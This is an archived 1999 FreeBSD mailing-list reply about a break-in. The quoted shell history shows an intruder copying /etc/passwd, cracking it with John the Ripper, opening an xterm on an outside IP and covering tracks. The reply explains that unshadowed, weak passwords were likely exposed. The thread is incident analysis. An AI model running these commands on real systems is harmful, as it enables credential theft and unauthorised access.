Date: Wed, 24 Mar 1999 02:55:32 -0800 (PST) From: <unknown@riverstyx.net> To: pirat@center.oaep.go.th Cc: questions@FreeBSD.ORG Subject: Re: /etc/passwd file Message-ID: <Pine.LNX.4.04.9903240254240.19060-100000@hades.riverstyx.net> In-Reply-To: <XFMail.990324171835.pirat@center.oaep.go.th>
next in thread | previous in thread | raw e-mail | index | archive | help
if you aren't shadowed, and you have weak passwords, chances are he's got a good sized chunk of your password file. the program he's using is john the ripper, which is a crack clone, which attempts toguess passwords by encrypting strings and comparing to the encrypted password... On Wed, 24 Mar 1999 pirat@center.oaep.go.th wrote: > hi, > > i notice recently that some one is using my /etc/passwd file, please see the > following history. > > > ===begin=== > ls -l > cd /etc > ls *host* > ls -l | less > ls -l | more > w > l s-l > cd > ls -l > rm M-cjohn-1.5.tar.gz > ls -l > rm *.gz > ls > cd john-1.5 > ls -l > cd run > l s-l > ls -l > cp /etc/passwd . > ls -l > ./john -single passwd > ls -l > cat password.lst > ^X > ls -l > cd .. > ls -l > cd doc > pico . > w > xterm -display 202.44.64.146:0.0 & > set > env > ping 202.44.64.146 > ping 202.44.64.145 > pwd > l s-l > ls -l > cd ../run > l s-l > ls -l > mv passwd passwd.1 > john -single passwd > ./john -single passwd > pico > pwd > ls -l > ./john -si passwd.1 > ./john -show passwd.1 > cat passwd.1 > ls -l > cd /etc > ls -l sha* > ls > ls -l passwd* > ls -l sh* > cd > pico > pwd > l s-l > ls -l > rm -rf john-1.5 > l s-l > ls -l > ping center > ping 202.44.64.144 > arp -a > ping 202.44.64.144 > cd /etc > ls -l hos* > cat host.conf > cat hosts > ls -l > pilot > exit > ===end of history=== > > > shall he finally know the user's password from the sequence of his action shown > above ? > > apologize me for asking this kind of question here. but many thanks in advance. > > > with regards, > psr > ---------------------------------- > E-Mail: pirat@center.oaep.go.th > Date: 24-Mar-99 > Time: 17:06:20 > > This message was sent by XFMail > ---------------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.LNX.4.04.9903240254240.19060-100000>